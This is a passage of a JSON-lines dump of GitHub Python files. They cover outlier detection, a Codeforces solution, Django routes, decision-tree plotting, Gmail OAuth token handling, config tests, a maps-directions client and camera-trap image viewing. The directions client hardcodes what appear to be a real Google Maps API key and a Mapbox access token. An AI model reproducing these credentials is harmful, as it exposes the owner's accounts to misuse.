How do we find the list of mapped widgets?\n raise NotImplementedError('FIXME: implement this call')","repo_name":"maierman/pyQtAbstractDescriptor","sub_path":"lib/ExtDataWidgetMapper.py","file_name":"ExtDataWidgetMapper.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39928513364","text":"import sys\ninput = sys.stdin.readline\n \ndef inInt():\n return int(input())\n \ndef inStr():\n return input().strip(\"\\n\")\n \ndef inIList():\n return(list(map(int,input().split())))\n \ndef inSList():\n return(input().split())\n \ndef bsearch(nums, target):\n N = len(nums or [])\n l = 0\n r = N - 1\n \n while l <= r:\n mid = ((l + r) // 2)\n if nums[mid] < target:\n l = mid + 1\n elif nums[mid] > target:\n r = mid - 1\n else:\n return (None, mid, None)\n \n return (r if r >= 0 else None, None, l if l <= N-1 else None)\n \ndef yesOrNo(val):\n print(\"YES\" if val else \"NO\")\n \n \ndef solve():\n n = inInt()\n s = inStr()\n ans = \"\"\n for i in range(n):\n sub = s[i:i + n]\n for j in range(len(ans)):\n if sub[j] == ans[j]:\n break\n else:\n ans += sub[len(ans)]\n ans += \"0\" * (n - len(ans))\n print(ans)\ntests = inInt()\nfor case in range(tests): \n solve()","repo_name":"raymon-zhang/cp","sub_path":"CodeForces/PyPy 3/1400A | String Similarity/90926808.py","file_name":"90926808.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42333803766","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport peakutils\nfrom scipy.stats.kde import gaussian_kde\n\n__all__ = ['Bootlier', 'boot', 'Hratio', 'find_hratio', 'find_outliers']\n\n\ndef _part(n, k):\n \"\"\"Integer partitioning\n from https://stackoverflow.com/questions/18503096/python-integer-partitioning-with-given-k-partitions\n \"\"\"\n def _kpart(n, k, pre):\n if n <= 0:\n return []\n if k == 1:\n if n <= pre:\n return [[n]]\n return []\n ret = []\n for i in range(min(pre, n), 0, -1):\n ret += [[i] + sub for sub in _kpart(n-i, k-1, i)]\n return ret\n return _kpart(n, k, n)\n\n\nclass Bootlier(object):\n \"\"\"Samples and MTM for a list of points for bootlier.\"\"\"\n\n def __init__(self, npoints, z, b, k):\n df = self._make_samples(npoints, z, b)\n df = self._calc_means(df)\n df = self._calc_trimmed_means(df, k)\n self.samples = df\n\n def _make_samples(self, npoints, z, b):\n samples = pd.DataFrame(columns=['sample'])\n for i in range(b):\n sample = [np.random.choice(npoints, size=z, replace=True)]\n samples.loc[i] = sample\n return samples\n\n def _calc_means(self, samples):\n samples['mean'] = samples['sample'].apply(lambda x: np.mean(x))\n return samples\n\n def _calc_trimmed_means(self, samples, k):\n samples['sample'] = samples['sample'].apply(lambda x: np.sort(x))\n samples['trimmed_mean'] = samples['sample'].apply(lambda x:\n np.mean(x[k:-k]))\n samples['mtm'] = (samples['mean'].values -\n samples['trimmed_mean'].values)\n return samples\n\n\ndef boot(npoints, z=None, b=500, k=2):\n \"\"\"\n Parameters\n ----------\n npoints : `list`\n List of N points from which to draw samples.\n z : `int`\n Number of points in each bootstrapped sample.\n b : `int`\n Number of bootstraps to draw.\n k : `int`\n Number of points to trim from each extreme side for\n the trimmed mean.\n \"\"\"\n if z is None:\n z = len(npoints)\n samples = Bootlier(npoints, z, b, k)\n return samples.samples\n\n\nclass Hratio(object):\n\n def 
__init__(self, mtmlist):\n mtmrange = max(mtmlist) - min(mtmlist)\n x = np.arange(min(mtmlist), max(mtmlist), mtmrange/100.)\n\n try:\n kde_orig = gaussian_kde(mtmlist, bw_method='silverman')\n self.horig = kde_orig.factor\n hrange = np.arange(0.1*self.horig, 10*self.horig, 0.02*self.horig)\n self.horig_kde = kde_orig\n peakind = peakutils.indexes(kde_orig(x), thres=0.02/max(kde_orig(x)))\n self.horig_peak = [(x[peak], kde_orig(x)[peak]) for peak in peakind]\n self.numpeaks = len(peakind)\n\n i = 0\n peaks = 100\n while peaks > 1:\n hcrit = hrange[i]\n kde = gaussian_kde(mtmlist, bw_method=hcrit)\n peakind = peakutils.indexes(kde(x), thres=0.02/max(kde(x)))\n peaks = len(peakind)\n i += 1\n self.hcrit = hrange[i-1]\n kde = gaussian_kde(mtmlist, bw_method=hrange[i-1])\n peakind = peakutils.indexes(kde(x), thres=0.02/max(kde(x)))\n self.hcrit_peak = [(x[peak], kde(x)[peak]) for peak in peakind]\n self.hcrit_kde = kde\n self.hratio = self.horig/hcrit\n self.hratio\n except:\n self.hratio = 100\n self.numpeaks = \"Unknown\"\n\n\ndef find_hratio(mtmlist):\n \"\"\"\n Parameters\n ----------\n mtmlist : `list`\n List of points for making KDEs.\n Returns\n -------\n hratio : Hratio\n The ratio of the original h value to the smallest value of h for\n which the KDE has only one peak and other parameters.\n Less than one contains outliers.\n \"\"\"\n hratio = Hratio(mtmlist)\n return hratio\n\n\ndef find_outliers(origpoints, sensitivity=1., detrend=False):\n \"\"\"Find outliers in a list using a given sensitivity parameter.\n Parameters\n ----------\n npoints : `list`\n List of points for which to find outliers.\n sensitivity : `float`\n Sensitivity threshold for the cutoff hratio.\n Default of 1. Less than 1 is less sensitive to outliers,\n greater than 1 is more sensitive.\n detrend : `boolean`\n If set to True, applies differencing to detrend the list.\n Default is False.\n Returns\n -------\n indices, outliers\n \"\"\"\n\n if detrend is True:\n i1, i2 = itertools.tee(iter(origpoints))\n next(i2)\n lst = [y-x for x, y in zip(i1, i2)]\n lst.insert(0, 0)\n npoints = lst\n points = sorted(npoints)\n else:\n points = sorted(origpoints)\n\n for i in range(0, int(len(points)/2)):\n if i != 0:\n a = points[0:-i]\n if len(a) > 1:\n boota = boot(a)\n ha = find_hratio(boota['mtm'])\n hrat = ha.hratio\n if hrat >= sensitivity:\n remaining = a\n break\n\n b = points[i:]\n if len(b) > 1:\n bootb = boot(b)\n hb = find_hratio(bootb['mtm'])\n hrat = hb.hratio\n if hrat >= sensitivity:\n remaining = b\n break\n\n p = _part(i, 2)\n\n for pair in p:\n a = points[pair[0]:-pair[1]]\n if len(a) > 1:\n boota = boot(a)\n ha = find_hratio(boota['mtm'])\n hrat = ha.hratio\n if hrat >= sensitivity:\n remaining = a\n break\n\n b = points[pair[1]:-pair[0]]\n if len(b) > 1:\n bootb = boot(b)\n hb = find_hratio(bootb['mtm'])\n hrat = hb.hratio\n if hrat >= sensitivity:\n remaining = b\n break\n if hrat >= sensitivity:\n break\n\n if detrend is True:\n outtrend = [x for x in npoints if x not in remaining]\n outindex = [npoints.index(x) for x in outtrend]\n outliers = [origpoints[i] for i in outindex]\n\n return outindex, outliers\n else:\n try:\n outliers = [x for x in origpoints if x not in remaining]\n outindex = [origpoints.tolist().index(x) for x in outliers]\n except AttributeError:\n outliers = [x for x in origpoints if x not in remaining]\n outindex = [origpoints.index(x) for x in outliers]\n\n return outindex, 
outliers\n","repo_name":"mtpatter/kaiba","sub_path":"kaiba/bootlier.py","file_name":"bootlier.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2820186568","text":"from os import name\nfrom django.urls import path\nfrom .views import (QFcompetitions, QFnewCompetition, QFparticipations, QInscriptions, QLCompetitions, Qcompetitions, Qjumps, \n change_result, changeAssign, competitionView, download_file, download_startlist, genSeries, insertParticipation, lanzV2, \n newCompetition, newEvent,newTime, nuevoatleta, otroview, pdfView, probandoGET, resultsView, saltoV2, startView, \n startlistView, verAtleta)\n\n\nurlpatterns = [\n path('cview/',competitionView,name='competition'),\n path('starlist/',startlistView,name='startlistView'),\n path('results/',resultsView,name='results_view'),\n path('new_competition/',newCompetition,name='newCompetition'),\n path('Q_competitions',Qcompetitions,name='Qcompetitions'),\n path('gen_series/',genSeries,name='genSeries'),\n path('s2/',saltoV2,name='saltos2'),\n path('t2/',lanzV2,name='lanz2'),\n path('download_file',download_file,name='download_file'),\n path('download_startlist/',download_startlist,name='download_startlist'),\n path('probando',startView.as_view(),name='probando'),\n path('prueba2',otroview.as_view(),name='prueba2'),\n path('Prueba3/',pdfView,name='prueba3'),\n path('respuesta',probandoGET,name='probandoGet'),\n path('change',change_result,name='changeResult'),\n path('veratle/',verAtleta,name='veratleta'),\n path('nuevoatleta',nuevoatleta,name='nuevoatle'),\n path('Q_jumps/',Qjumps,name='Qjumps'),\n #CHANGES\n path('new_event',newEvent,name='create_event'),\n path('new_participation',insertParticipation,name='change_participation'),\n path('new_time',newTime,name='change_time'),\n path('change_data_assign',changeAssign,name='change_assign'),\n #QUERYS\n path('QL_competitions',QLCompetitions,name='QueryList_competitions'),\n path('QF_competitions',QFcompetitions,name='Query_competitions'),\n path('QF_newCompetition',QFnewCompetition,name='Query_newCompetition'),\n path('QF_participations',QFparticipations,name='Query_participations'),\n path('Q_inscriptions',QInscriptions,name='Query_inscriptions'),\n]","repo_name":"mimoshin/ProyectFDCH","sub_path":"apps/competition/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17426722606","text":"from src.setCases.setCases import SetCases\nfrom config.config import graph_array, graph_array_ratio\n\nclass Node:\n def __init__(self, data: SetCases, id_node: int , val_attr = None):\n \"\"\"Initializes a node with a set of data, an identifier and a value of attribute\n\n Args:\n data (SetCases): set of data object to be used in the node\n id_node (int): node identifier\n val_attr (str, optional): When node is leaf, it will contain the value of the chosen attribute. 
Defaults to None.\n \"\"\" \n # asign initial values for class attributes\n self.data = data\n self.children = []\n self.curr_class = ''\n self.chosen_att = ''\n self.id_node = id_node\n self.val_attr = val_attr\n self.gain = 0\n self.childrenNodeColor = 'green'\n\n def addChildren(self, node):\n \"\"\"Adds a child to the node\n Args:\n node ([Node]): [Node to be added]\n \"\"\"\n self.children.append(node)\n \n def printTree(self, depth: int, graph, previous_node, name_previous_node: int, algorithm: str):\n \"\"\"Prints the tree generated with graphviz\n\n Args:\n depth (int): intial depth of the tree, increases by each level\n graph ([Digraph]): graphviz Digraph object\n previous_node ([Node]): node from previous level where the current instance of the function was called\n name_previous_node (int): previous node identifier\n algorithm (str): chosen algorithm to print the tree (gain or gain ratio)\n \"\"\"\n # If the chosen attribute for the current iteration is not an empty string, it creates a node with the chosen attribute for the class, and shows the gain of the node (gain or gain ratio)\n if self.chosen_att != '':\n graph.node(name = str(self.id_node),label = f'Clase: {self.chosen_att} \\n Gain: {round(self.gain,3)}')\n else:\n #If the leaf node has more than one value of the class (inpure), it sets the node color to orange\n if len(self.data.cases[self.data.class_column_name].value_counts())>1: \n self.childrenNodeColor = 'orange'\n else:\n #If the leaf node has only one value of the class (pure), it sets the node color to green\n self.childrenNodeColor = 'green'\n #We create the leaf node with the previous assigned color, and show the gain and amount of cases for each class attribute the node has\n label = f'Clase: {self.curr_class} \\n Gain: {round(self.gain,3)} \\n [{self.data.cases[self.data.class_column_name].value_counts().to_string()}] \\n { str(round(((list(self.data.cases[self.data.class_column_name].value_counts())[0]) / sum(self.data.cases[self.data.class_column_name].value_counts()))*100,2)) }%'\n \n graph.node(name = str(self.id_node), label= label,color=self.childrenNodeColor,style='filled')\n # We create the edge between the current node and the previous node\n if depth != 0:\n graph.edge(str(name_previous_node), str(self.id_node),label=str(self.val_attr),splines='line')\n name_previous_node+=1\n\n for item in self.children:\n # We append the current generated graph to the graph array, so as to keep each step made in the tree\n if algorithm == 'gain':\n graph_array.append(graph.copy())\n else:\n graph_array_ratio.append(graph.copy())\n item.printTree(depth+1, graph, self, self.id_node, algorithm)\n \n def printTreeWithoutDetails(self, depth: int, graph, previous_node, name_previous_node: int, algorithm: str):\n \"\"\"Prints the tree generated with graphviz with only name and purity\n\n Args:\n depth (int): intial depth of the tree, increases by each level\n graph ([Digraph]): graphviz Digraph object\n previous_node ([Node]): node from previous level where the current instance of the function was called\n name_previous_node (int): previous node identifier\n algorithm (str): chosen algorithm to print the tree (gain or gain ratio)\"\"\"\n if self.chosen_att != '':\n # decision node printing\n graph.node(name = str(self.id_node),label = f'Clase: {self.chosen_att}')\n else:\n if len(self.data.cases[self.data.class_column_name].value_counts())>1:\n # inpure leaf node\n self.childrenNodeColor = 'orange'\n else:\n # pure leaf node\n self.childrenNodeColor = 'green'\n \n 
label = f'Clase: {self.curr_class} \\n { str(round(((list(self.data.cases[self.data.class_column_name].value_counts())[0]) / sum(self.data.cases[self.data.class_column_name].value_counts()))*100,2)) }%'\n graph.node(name = str(self.id_node), label=label,color=self.childrenNodeColor,style='filled')\n if depth != 0:\n # none root edge creation, joins parent with current, as root has no parent, it is only called for non root nodes\n graph.edge(str(name_previous_node), str(self.id_node),label=str(self.val_attr),splines='line')\n name_previous_node+=1\n for item in self.children:\n # We append the current generated graph to the graph array, so as to keep each step made in the tree\n if algorithm == 'gain':\n graph_array.append(graph.copy())\n else:\n graph_array_ratio.append(graph.copy())\n # recursive call\n item.printTreeWithoutDetails(depth+1, graph, self, self.id_node, algorithm)\n ","repo_name":"AlejandroFNadal/ia_decision_trees","sub_path":"src/node/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71558739361","text":"import os\nimport pickle\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n# Se modificar o escopo, exclua o arquivo token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/gmail.send']\n\ndef get_credentials():\n creds = None\n # O arquivo token.pickle armazena as credenciais do usuário.\n # Ele é criado automaticamente ao executar pela primeira vez.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # Se não houver credenciais válidas, deixe o usuário fazer login.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Salve as credenciais para a próxima execução\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\nif __name__ == \"__main__\":\n get_credentials()\n","repo_name":"ArthurMS15/arthurms15.github.io","sub_path":"segurancasenha/teste/generate_token.py","file_name":"generate_token.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41865835164","text":"import torch as th\nimport numpy as np\nimport os\nimport random\n\nrng = {'np_rng': None, 'th_rng': None}\ndef init_rng(seed: int) -> None:\n random.seed(seed)\n\n rng['np_rng'] = np.random.default_rng(seed)\n rng['th_rng'] = th.Generator()\n rng['th_rng'].manual_seed(0)\n\n os.environ[\"CUBLAS_WORKSPACE_CONFIG\"] = ':16:8'\n th.random.manual_seed(seed)\n th.backends.cudnn.benchmark = False\n th.use_deterministic_algorithms(True)\n\ndef seed_worker(worker_id):\n worker_seed = th.initial_seed() % 2**32\n np.random.seed(worker_seed)\n random.seed(worker_seed)","repo_name":"nsoul97/Real-Time-Object-Size-Prediction","sub_path":"real_time_object_prediction/reproducibility.py","file_name":"reproducibility.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12892289071","text":"import source.utilities.config.config_builder as config_builder\nimport unittest\n\nfrom source.policy.parameters import AtariSize\nfrom 
source.utilities.config.hyperparameters import HyperParameters\nfrom unittest.mock import patch\n\n\nclass FullTest(unittest.TestCase):\n @patch('socket.gethostname')\n def test_get_hyperparameters(self, socket_wd):\n socket_wd.return_value = 'cosy04'\n hyperparameters = config_builder.get_hyperparameters()\n self.assertEqual(17, hyperparameters.ppo_epochs)\n self.assertEqual(1, hyperparameters.nn_learn_rate)\n self.assertEqual('TestNoFrameskip-v4', hyperparameters.env_name)\n\n\nclass GetGroupTest(unittest.TestCase):\n @patch('socket.gethostname')\n def test_all_groups(self, hostname_wd):\n expected = {0: [1, 2, 3],\n 1: [4, 5, 6],\n 2: [7, 8, 9],\n 3: [10, 11, 12],\n 4: [13, 14, 15]}\n for i in range(15):\n name = 'cosy0' + str(i + 1)\n hostname_wd.return_value = name\n group = config_builder.get_group()\n self.assertTrue((i + 1) in expected[group])\n\n def test_host_name_not_cosy(self):\n group = config_builder.get_group()\n self.assertEqual(0, group)\n\n\nclass UpdateParametersTest(unittest.TestCase):\n def test_atari_size_exception(self):\n config = {'nn_size': 'LARGE'}\n hyperparameters = HyperParameters('')\n config_builder._update_parameters(hyperparameters, config)\n self.assertEqual(AtariSize.LARGE, hyperparameters.nn_size)\n\n\nclass GetHyperparametersTest(unittest.TestCase):\n config = {'env_name': 'SpaceInvaders-v4',\n 'nn_learn_rate': '0.05'}\n\n @patch('source.utilities.config.config_builder.open_config')\n def test_config_structure(self, config_wd):\n config_wd.return_value = self.config\n config = config_builder.get_hyperparameters()\n self.assertEqual('SpaceInvadersNoFrameskip-v4', config.env_name)\n self.assertEqual(0.05, config.nn_learn_rate)\n self.assertEqual(3, config.ppo_epochs)\n\n\nclass InitTest(unittest.TestCase):\n def test_init_incomplete_name(self):\n result = config_builder._init_hyperparameters('Test-v4')\n self.assertEqual('TestNoFrameskip-v4', result.env_name)\n\n def test_init_complete_name(self):\n result = config_builder._init_hyperparameters('TestNoFrameskip-v1')\n self.assertEqual('TestNoFrameskip-v1', result.env_name)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Aethiles/ppo-pytorch","sub_path":"test/utilities/test_config_builder.py","file_name":"test_config_builder.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14281991434","text":"import http.client, urllib.parse\nimport json\n\n\ndef http_call(method, connection, path, dictionary={}):\n\t\n connection.request( method, path +'?'+ urllib.parse.urlencode(dictionary))\n resp = connection.getresponse()\n status=resp.status\n body_bytes = resp.read()\n body = body_bytes.decode( resp.headers.get_content_charset( 'utf-8' ) )\n return ( status, body )\n\n\nurl = 'maps.googleapis.com'\t\nconnection = http.client.HTTPSConnection(url)\n\nurl2='api.mapbox.com'\nconnection2=http.client.HTTPSConnection(url2)\n\t\n\ndef geoCode(location, typ):\n\t(status, body ) = http_call( \"GET\", connection, \"/maps/api/geocode/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"address\":location})\n\tdata=json.loads(body)\n\t#if there are multiple locations\n\tif len(data[\"results\"])>1 and typ==\"coords\":\n\t\tprint (\"There is more than one location with that address\")\n\t\tfor i in range (len(data[\"results\"])):\n\t\t\taddress=str(i)+\" \"+data[\"results\"][i][\"formatted_address\"]\n\t\t\tprint (address)\n\t\tprint (\"Enter the list number you would like to 
use\")\n\t\tindex=input(\">>\")\n\t\tlocation=data[\"results\"][int(index)]\n\n\t\tif typ==\"coords\":\n\t\t\tlat=data[\"results\"][int(index)][\"geometry\"][\"location\"][\"lat\"]\n\t\t\tlon=data[\"results\"][int(index)][\"geometry\"][\"location\"][\"lng\"]\n\t\t\treturn (lat, lon)\n\n\t\telif typ==\"address\":\t\n\t\t\taddress=data[\"results\"][int(index)][\"formatted_address\"]\n\t\t\treturn (address)\n\telif data[\"status\"]==\"OK\":\n\t\tif typ==\"coords\":\n\t\t\tlat=data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n\t\t\tlon=data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\t\t\treturn (lat, lon)\n\n\t\telse:\n\t\t\taddress=data[\"results\"][0][\"formatted_address\"]\n\t\t\treturn (address)\n\telse:\n\t\tprint (\"Sorry, we could not find that location\")\n\t\treturn (None)\n\n\n\ndef getDirections(origin, destination):\n\tgoogInstructions=\"\"\n\totherInstructions=\"\"\n\t( status, body ) = http_call( \"GET\", connection, \"/maps/api/directions/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"origin\":origin, \"destination\":destination})\n\tdata=json.loads(body)\n\tdriveTime=data[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n\t\n\n\t( status, body ) = http_call( \"GET\", connection, \"/maps/api/directions/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"origin\":origin, \"mode\":\"bicycling\",\"destination\":destination})\n\tdata=json.loads(body)\n\tbikeTime=data[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n\t#gets directions\n\t#for i in range (len(data[\"routes\"][0][\"legs\"][0][\"steps\"])-1):\n\t#\tgoogInstructions+=\" \"+data[\"routes\"][0][\"legs\"][0][\"steps\"][i][\"html_instructions\"]\n\t#googInstructions=googInstructions.replace('', '')\n\t#googInstructions=googInstructions.replace('', '')\n\t#print (\"Google Bike Directions : \"+googInstructions)\n\n\to=origin.split(',')\n\tswitchedOrigin=o[1]+','+o[0]\n\td=destination.split(',')\n\tswitchedDestination=d[1]+','+d[0]\n\n\t( status, body ) = http_call( \"GET\", connection2, \"/v4/directions/mapbox.cycling/\"+switchedOrigin+\";\"+switchedDestination+\".json\", {\"access_token\":\"pk.eyJ1IjoiY2xhdWRpYWZpbm4iLCJhIjoiY2llbHJpMG4xMDBlZHNzbTRud2FubGJtcyJ9.UJaO_S1zju89aeXPex7c9g\"})\n\tdata=json.loads(body)\n\tcompTime = (data[\"routes\"][0][\"duration\"])/60\n\t\n\t#gets directions\n\t#for i in range (len(data[\"routes\"][0][\"steps\"])):\n\t#\totherInstructions+=\" \"+data[\"routes\"][0][\"steps\"][i][\"maneuver\"][\"instruction\"]\n\t#print(\"Comparison directions\"+str(otherInstructions))\n\treturn (driveTime, bikeTime, compTime)\n\n\n\n\n","repo_name":"claudiafinn/Event-Web-Service","sub_path":"GoogleDirections.py","file_name":"GoogleDirections.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15500120400","text":"import goodboy as gb\nimport pytest\nimport sqlalchemy as sa\n\nfrom goodboy_sqlalchemy.column import Column, ColumnBuilder, ColumnBuilderError\nfrom goodboy_sqlalchemy.column_schemas import column_schema_builder\n\nBase = sa.orm.declarative_base()\n\n\nclass Dummy(Base):\n __tablename__ = \"dummies\"\n\n id = sa.Column(sa.Integer, primary_key=True)\n\n field_1 = sa.Column(sa.String, nullable=False, unique=True)\n field_2 = sa.Column(sa.String)\n field_3 = sa.Column(sa.String, default=\"val\")\n field_4 = sa.Column(sa.String, server_default=\"val\")\n field_5 = sa.Column(\"field_5_in_database\", sa.String)\n\n\n@pytest.fixture\ndef 
column_builder():\n return ColumnBuilder(column_schema_builder)\n\n\ndef test_builds_simple_columns(column_builder: ColumnBuilder):\n assert column_builder.build(Dummy, [\"field_1\", \"field_2\"]) == [\n Column(\"field_1\", gb.Str(), required=True, unique=True),\n Column(\"field_2\", gb.Str(allow_none=True), required=False, unique=False),\n ]\n\n\ndef test_builds_renamed_columns(column_builder: ColumnBuilder):\n print(column_builder.build(Dummy, [\"field_5\"])[0])\n print(column_builder.build(Dummy, [\"field_5\"])[0].__dict__)\n assert column_builder.build(Dummy, [\"field_5\"]) == [\n Column(\"field_5\", gb.Str(allow_none=True), required=False, unique=False),\n ]\n\n\ndef test_handles_default_value(column_builder: ColumnBuilder):\n column = Column(\n \"field_3\",\n gb.Str(allow_none=True),\n required=False,\n unique=False,\n default=\"val\",\n )\n\n assert column_builder.build(Dummy, [\"field_3\"]) == [column]\n\n\ndef test_handles_server_default_value(column_builder: ColumnBuilder):\n column = Column(\n \"field_4\",\n gb.Str(allow_none=True),\n required=False,\n unique=False,\n has_default=True,\n )\n\n assert column_builder.build(Dummy, [\"field_4\"]) == [column]\n\n\ndef test_raises_error_when_column_not_found(column_builder: ColumnBuilder):\n with pytest.raises(ColumnBuilderError):\n column_builder.build(Dummy, [\"unknown_field\"])\n","repo_name":"andryunin/goodboy-sqlalchemy","sub_path":"tests/column/test_column_builder.py","file_name":"test_column_builder.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18011399361","text":"##################################################\n# Purpose: View camera trap image data #\n# Author: Amy Andrews #\n# Resources used:\n# Pytorch documentation https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html\n##################################################\n#%%\nimport matplotlib.image as mpimg\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport torchvision\nimport seaborn as sns\nimport json\n\nfrom utils import *\nfrom load_data import load_data\nfrom set_args import get_args\nfrom torch.utils.data import DataLoader\n\nimport config\n\nargs = get_args()\n\n#%%\n# look at meta-data\nda = pd.read_csv(args['metadata'])\nda['im_id'] = np.arange(da.shape[0])\nalct_splits = pd.read_csv('splits/kenya_splits.csv')\nda = da.join(alct_splits.set_index('Unnamed: 0'), on='Unnamed: 0')\ncounting(np.asarray(da['daytime']))\n\nwith open(animal_dicts, 'rb') as handle:\n animals_dict = json.load(handle)\nda['animal_name'] = da['category_id'].apply(lambda x: animals_dict[x]).to_numpy()\nsns.countplot(y = \"animal_name\",\n data = da,\n hue=\"img_set2\",\n order = da[\"animal_name\"].value_counts().index)\nplt.tight_layout()\nplt.show()\n\n# counts for the subset groups\nsubset1 = da[da['10_perc_split_train'] == 0]\nfor i in range(10):\n print(len(da[da['10_perc_split_train'] == i]))\n\ntrainOnly = da[da['img_set2']=='train']\ncounting(np.asarray(subset1['category_id']))\ncountsDa = da[da['img_set2']=='train'].groupby(['10_perc_split_train', 'category_id']).agg(['count'])\n\n\n#%%\n# look at some train set data\nif args['train_loss'] == 'supervised':\n train_set, val_set, test_set = load_data(args)\n train = DataLoader(train_set, batch_size=15, shuffle=False, num_workers=args['num_workers'])\n dataiter = iter(train)\n images = dataiter.next()\n vis_ims(images['img1_path'], images['target'], images['target'], args, 
nrow=5)\n\n\n# examine images when fixmatch is set as loss\nif args['train_loss'] == 'fixmatch':\n supervised_set, unsupervised_set, val_set, test_set= load_data(args)\n unsupervised = DataLoader(unsupervised_set, batch_size=9, shuffle=False, num_workers=args['num_workers'])\n val = DataLoader(val_set, batch_size=9, shuffle=False, num_workers=args['num_workers'])\n dataiter = iter(unsupervised)\n images = dataiter.next()\n\n vis_ims(images['img1_path'], images['target'], images['target'], args, nrow=3)\n vis_ims(images['weak_augmentation'], images['target'], images['target'], args, nrow=3)\n vis_ims(images['strong_augmentation'], images['target'], images['target'], args, nrow=3)\n\n #### view CIFAR data\n\n import matplotlib.pyplot as plt\n import numpy as np\n\n classes = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n dataiter = iter(unsupervised)\n imdata = dataiter.next()\n weakims = imdata['weak_augmentation']\n strongims = imdata['strong_augmentation']\n labels = imdata['target']\n imshow_mod(torchvision.utils.make_grid(weakims, nrow=3))\n imshow_mod(torchvision.utils.make_grid(strongims, nrow=3))\n print(' '.join('%5s' % classes[labels[j]] for j in range(9)))\n\n dataiterval = iter(val)\n imdataval = dataiterval.next()\n valims = imdataval['im']\n labelsval = imdataval['target']\n imshow_mod(torchvision.utils.make_grid(valims, nrow=3))\n print(' '.join('%5s' % classes[labelsval[j]] for j in range(9)))\n\n\n# examine images in splits\nargs = get_args()\n\nfrom load_data import im_transforms, images_data\nfrom torch.utils.data import Subset\nweak_transform, strong_transform, test_transform = im_transforms(args)\ntrain_set = images_data(args, ['train'], test_transform)\n\nsplitsDict = {}\nfor i in [1,2,3,4,5]:\n filepath = 'splits/kenya320unequalLabels' + str(i) + '.pkl'\n with open(filepath, 'rb') as handle:\n loaded = pickle.load(handle)\n splitsDict[(i - 1)] = np.asarray(loaded)\n\ntrain_set = Subset(train_set, splitsDict[0])\n#train_set = images_data(args, split=['train'], transform=train_transform, return_single_image=True, indices=labeled_idx)\ntrain = DataLoader(train_set, batch_size=80, shuffle=False, num_workers=args['num_workers'])\ndataiter = iter(train)\nimages = dataiter.next()\nvis_ims(images['img1_path'], images['target'], images['target'], args, nrow=10)\n\n\n\n\n#############################\n# create plot of zebras\n# within-category variation\n#############################\n\nimcheck = mpimg.imread('warthog.jpg')\nimcheck2 = mpimg.imread('zebra.jpg')\nplt.imshow(imcheck2); plt.show()\n\nimg1 = mpimg.imread('zebra.jpg')\nimg2 = mpimg.imread('zebra.jpg')\nimg3 = mpimg.imread('zebra.jpg')\nimg4 = mpimg.imread('zebra.jpg')\n\nim1caption = 'Width = {}, Height = {}'.format(img1.shape[1], img1.shape[0])\nim2caption = 'Width = {}, Height = {}'.format(img2.shape[1], img2.shape[0])\nim3caption = 'Width = {}, Height = {}'.format(img3.shape[1], img3.shape[0])\nim4caption = 'Width = {}, Height = {}'.format(img4.shape[1], img4.shape[0])\n\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.figure(figsize=(8, 6))\nf, axarr = plt.subplots(2, 2)\naxarr[0,0].imshow(img1)\naxarr[0,0].set_title(\"Ideal\")\naxarr[0,0].axes.yaxis.set_ticks([])\naxarr[0,0].axes.xaxis.set_ticks([])\naxarr[0,0].set_xlabel(im1caption)\n\naxarr[0,1].imshow(img2)\naxarr[0,1].set_title(\"Poor illumination\")\naxarr[0,1].axes.yaxis.set_ticks([])\naxarr[0,1].axes.xaxis.set_ticks([])\naxarr[0,1].set_xlabel(im2caption)\n\naxarr[1,0].imshow(img3)\naxarr[1,0].set_title(\"Perspective 
